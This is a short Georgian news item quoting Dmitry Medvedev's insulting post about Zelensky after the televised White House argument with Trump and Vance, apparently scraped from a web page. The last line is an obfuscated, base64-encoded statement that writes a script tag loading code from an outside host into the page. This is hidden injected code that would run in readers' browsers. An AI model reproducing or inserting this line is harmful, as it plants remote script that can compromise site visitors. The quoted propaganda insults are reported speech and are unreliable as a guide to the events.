tube
ავერსი jaluzi

ტრამპმა პირველად უთხრა კოკაინურ კლოუნს სიმართლე სახეში: კეივის რეჟიმი მესამე მსოფლიო ომს ეთამაშება, - ამის შესახებ რუსეთის უშიშროების საბჭოს თავმჯდომარის მოადგილე, დმიტრი მედვედევი სოციალურ ქსელში წერს.

„სასტიკი თრევა ოვალურ ოფისში. ტრამპმა პირველად უთხრა კოკაინურ კლოუნს სიმართლე სახეში: კეივის რეჟიმი მესამე მსოფლიო ომს ეთამაშება. ხოლო უმადურმა ღორმა საღორის მფლობელებისგან ძლიერი თავში წამორტყმა მიიღო. ეს სასარგებლოა. მაგრამ ცოტაა - ნაცისტური მანქანისთვის სამხედრო დახმარების შეჩერებაა საჭირო“, - წერს დმიტრი მედვედევი.

ცნობისთვის, დღეს, თეთრ სახლში აშშ-ის პრეზიდენტმა დონალდ ტრამპმა და ვიცე-პრეზიდენტმა ჯეი დი ვენსმა კამერების წინ ხმამაღლა კამათი დაიწყეს უკრაინის პრეზიდენტ, ვოლოდიმირ ზელენსკისთან. ამის შემდეგ უკრაინასა და აშშ-ს შორის იშვიათი ლითონების შესახებ შეთანხმების ხელმოწერა და ერთობლივი პრესკონფერენცია გაუქმდა, ხოლო ზელენსკიმ დროზე ადრე დატოვა თეთრი სახლი.

172
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");